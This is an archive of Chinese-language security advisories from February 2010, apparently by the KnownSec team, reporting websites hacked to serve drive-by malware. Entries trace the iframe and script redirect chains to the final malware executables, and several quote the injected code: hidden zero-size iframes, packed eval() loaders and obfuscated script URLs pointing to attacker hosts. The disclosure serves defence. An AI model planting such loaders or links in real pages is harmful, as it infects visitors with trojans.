This theme is downloaded from wordpress themes website.

Archive for February, 2010

52硬件被植入恶意代码

发 布 时 间 :Sat Feb 27 18:57:27 2010
最后更新时间:Sat Feb 27 18:57:27 2010
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 52硬件(http://www.52hardware.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.52hardware.com/adv/20040315/10491.html

挂马分析:
[root]http://www.52hardware.com/adv/20040315/10491.html
…[script]http://pagead07.googlesyndications.co.cc/data/backup/css.png?RAB6RM
……[iframe]http://www.sat-china.com/wxds/2007/upme.htm?lo3ving
………[script]http://www.sat-china.com/wxds/2007/what.jpg?123
…………[exe]http://www.sat-china.com/wxds/2007/m.css
…[script]http://js.users.51.la/3369876.js

最终下载病毒文件:
http://www.sat-china.com/wxds/2007/m.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 8% [?]

网站挂马记录 knownsec 27 Feb 2010 No Comments

好耶广告被植入恶意代码

发布时间:Mon Feb 22 2010 21:08:30 UTC+0800
最后更新时间:Mon Feb 22 2010 21:08:30 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 好耶广告(http://allyes.com/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://voit.allyes.com/xml/xml.js?ad_aimagic_750×169

挂马分析:
[root]http://voit.allyes.com/xml/xml.js?ad_aimagic_750×169
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
……[iframe]http://ferrari07.2288.org:801/c089644/c.htm
………[script]http://ferrari07.2288.org:801/c089644/c.js
………[script]http://ferrari07.2288.org:801/c089644/a.jpg
…………[color=red][exe]http://sbl123.3322.org:8088/c08.exe[/color]
………[script]http://ferrari07.2288.org:801/c089644/b.jpg
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://ferrari07.2288.org:801/c089644/c08.htm
…[iframe]http://google.08.cn/css/ad.html
…[iframe]http://google.08.cn/css/ad.html

最终下载病毒文件:
http://sbl123.3322.org:8088/c08.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

网站挂马记录 knownsec 22 Feb 2010 No Comments

成都大学被植入恶意代码

发布时间:Sat Feb 20 2010 20:40:30 UTC+0800
最后更新时间:Sat Feb 20 2010 20:40:30 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 成都大学(http://www.cdu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://xdxq.cdu.edu.cn/css/common.js

恶意代码:
document.writeln(”<iframe src=http://xdxq.cdu.edu.cn/flash/bottom.htm width=100 height=0></iframe>”);
document.writeln(”<iframe src=http://xdxq.cdu.edu.cn/flash/top.htm width=100 height=0></iframe>”);

挂马分析:
[root]http://xdxq.cdu.edu.cn/css/common.js
…[iframe]http://xdxq.cdu.edu.cn/flash/bottom.htm
……[exe]http://xdxq.cdu.edu.cn/flash/calc.exe
…[iframe]http://xdxq.cdu.edu.cn/flash/top.htm
……[exe]http://xdxq.cdu.edu.cn/flash/calc.exe

最终下载病毒文件:
http://xdxq.cdu.edu.cn/flash/calc.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 9% [?]

网站挂马记录 knownsec 20 Feb 2010 No Comments

潍坊学院被植入恶意代码

发布时间:Wed Feb 17 2010 19:40:30 UTC+0800
最后更新时间:Wed Feb 17 2010 19:40:30 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 潍坊学院(http://www.wfu.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://yyx.wfu.edu.cn/admin/web.htm

挂马分析:
[root]http://yyx.wfu.edu.cn/
…[iframe]http://yyx.wfu.edu.cn/admin/web.htm
……[exe]http://yyx.wfu.edu.cn/admin/aspweb.exe

最终下载病毒文件:
http://yyx.wfu.edu.cn/admin/aspweb.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

网站挂马记录 knownsec 17 Feb 2010 No Comments

全国大学四、六级考试被植入恶意代码

发布时间:Sat Feb 13 2010 19:30:15 UTC+0800
最后更新时间:Sat Feb 13 2010 19:30:15 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 全国大学四、六级考试(http://www.cet.edu.cn/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://www.cet.edu.cn/menu.js

网页被嵌入恶意链接代码:

if(document.cookie.indexOf(’helio’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’helio=Yes;path=/;expires=’+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’4.5(\’<0 3=2 1=”6://d.7.c/b/a.8?9″></0>\’)',14,14,’script|src|javascript|language|document|writeln|http|xcdx169|js|RDCMOPQF|log|include|net|bbs’.split(’|'),0,{}));}

挂马分析:
[root]http://www.cet.edu.cn/(全国大学四、六级考试)
…[script]http://www.cet.edu.cn/menu.js
……[script]http://bbs.xcdx169.net/include/log.js?RDCMOPQF
………[iframe]http://jkwd.xywy.com/20091104/tmp/hx.html?人0212
…………[script]http://jkwd.xywy.com/20091104/tmp/h.js
……………[exe]http://online.xywy.com/html/zh/wow/d.exe
…………[script]http://jkwd.xywy.com/20091104/tmp/b.js

最终下载病毒文件:
http://online.xywy.com/html/zh/wow/d.exe

通过执行以上病毒文件,来达到完全控制访问者的系统。

Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 10% [?]

网站挂马记录 knownsec 13 Feb 2010 No Comments

avast!中文论坛被植入恶意代码

发布时间:Wed Feb 10 2010 19:19:25 UTC+0800
最后更新时间:Wed Feb 10 2010 19:19:25 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)于今天捕获 avast!中文论坛(http://avast1.cn/bbs/)被植入恶意代码。
用户访问该页面将可能被安装木马病毒等恶意程序,可以导致电脑被黑客控制并且被窃取敏感信息。

MalUrl:http://avast1.cn/bbs/index.php

网页被嵌入恶意链接代码:

<script language=”javascript” type=”text/javascript”>
if(document.cookie.indexOf(’helio’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=’helio=Yes;path=/;expires=’+expires.toGMTString()
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(’\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(’4.5(\’<0 3=2 1=”6://d.7.c/b/a.8?9″></0>\’)',14,14,’script|src|javascript|language|document|writeln|http|xcdx169|js|BFUUVOGI|log|include|net|bbs’.split(’|'),0,{}));}
</script>

挂马分析:
[root]http://avast1.cn/bbs/index.php
…[script]http://avast1.cn/bbs/forumdata/cache/common.js?Q99
……[script]http://bbs.xcdx169.net/include/log.js?PXEOFXLD
………[iframe]http://jkwd.xywy.com/20091104/tmp/hx.html?天10
…[script]http://bbs.xcdx169.net/include/log.js?BFUUVOGI
……[iframe]http://jkwd.xywy.com/20091104/tmp/hx.html?天10
………[script]http://jkwd.xywy.com/20091104/tmp/h.js
…………[exe]http://bbs.xcdx169.net/newbbs/hx.css
………[script]http://jkwd.xywy.com/20091104/tmp/b.js

最终下载病毒文件:
http://bbs.xcdx169.net/newbbs/hx.css

通过执行以上病毒文件,来达到完全控制访问者的系统。

Google对该网站的判定:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

Popularity: 12% [?]

网站挂马记录 knownsec 10 Feb 2010 No Comments

挂马简报(2010.2.6)

发布时间:Sat Feb 6 2010 18:22:07 UTC+0800
最后更新时间:Sat Feb 6 2010 18:22:07 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)今日监测到以下网站被植入恶意代码,用户访问以下挂马页面可能被安装木马病毒等恶意程序,导致敏感信息泄露甚至电脑被黑客控制。

网站名称:做梦网
网站链接:http://www.zuomeng.net/
恶意代码:
<iframe src=http://www.yjsjl.cn/css/index.html width=0 height=0></iframe>
所在页面:http://www.zuomeng.net/
下载病毒:
http://www.yjsjl.cn/css/time.exe
其他机构判定结果:
google:恶意

网站名称:北京24小时
网站链接:http://www.bj24h.com/
恶意代码:
<script language=javascript src=http://h%6Ah.x%6Frg.%70l/c.js?google_ad=01×2402_ad></script>
所在页面:http://www.bj24h.com/
下载病毒:
http://abr.bij.pl/l/yy.exe
其他机构判定结果:
google:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

Popularity: 9% [?]

网站挂马记录 knownsec 06 Feb 2010 No Comments

挂马简报(2010.2.3)

发布时间:Wed Feb 3 2010 20:22:07 UTC+0800
最后更新时间:Wed Feb 3 2010 20:22:07 UTC+0800
________________________________________
知道创宇安全团队(KnownSec Team)今日监测到以下网站被植入恶意代码,用户访问以下挂马页面可能被安装木马病毒等恶意程序,导致敏感信息泄露甚至电脑被黑客控制。

网站名称:北京IT外包网
网站链接:http://www.topnet.bj.cn/
恶意代码:
<script language=javascript src=http://h%69r.x%6Frg.%70l/c.js?google_ad=01×1101_ad></script>
所在页面:http://www.topnet.bj.cn/
下载病毒:
http://abl.bij.pl/l/vv.exe
其他机构判定结果:
google:安全

网站名称:七星阁
网站链接:http://www.qixingge.com/
恶意代码:
document.writeln(”<script language=\”javascript\”>”);
document.writeln(”if(document.cookie.indexOf(\’hello\’)==-1){var expires=new Date();expires.setTime(expires.getTime()+24*60*60*1000);document.cookie=\’hello=Yes;path=\/;expires=\’+expires.toGMTString()”);
document.writeln(”eval(function(p,a,c,k,e,d){e=function(c){return(c<a?\’\':e(parseInt(c\/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!\’\’.replace(\/^\/,String)){while(c–)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return\’\\\\w+\’};c=1};while(c–)if(k[c])p=p.replace(new RegExp(\’\\\\b\’+e(c)+\’\\\\b\’,\’g\’),k[c]);return p}(\’3.e(\”<b 9=7 c=5:\/\/6.a.2\/4\/d\/f\/1.8?0><\/b>\”);\’,62,16,\’APAHOD|ads|com|document|wap|http|club|javascript|jpg|language|9istyle|script|src|include|writeln|main\’.split(\’|\’),0,{}));}”);
document.writeln(”<\/script>”)
所在页面:http://www.qixingge.com/scripts/common.js
下载病毒:
http://club.9istyle.com/wap/include/lsass.exe
其他机构判定结果:
google:安全

知道安全提醒网民,要做好安全防护,避免因网络安全问题影响您正常的生活和工作。如果您发现网站被挂马,也可向国家互联网应急中心举报。 国家互联网应急中心:http://www.cert.org.cn/
推荐的应对方法:
1.安装客户端保护软件。
2.检查更新windows及第三方软件补丁程序。

如果您有技术方面的问题或者需要技术咨询可以通过以下方式联系我们:
邮箱:sec@knownsec.com或sec@scanw.com

知道创宇:专业的WEB安全公司   www.knownsec.com

我们很乐意他人使用我们的工作成果,如果使用我们数据的请通知我们一下,我们将十分感谢。

Popularity: 10% [?]

网站挂马记录 knownsec 03 Feb 2010 No Comments

Recommended: Buy movies online.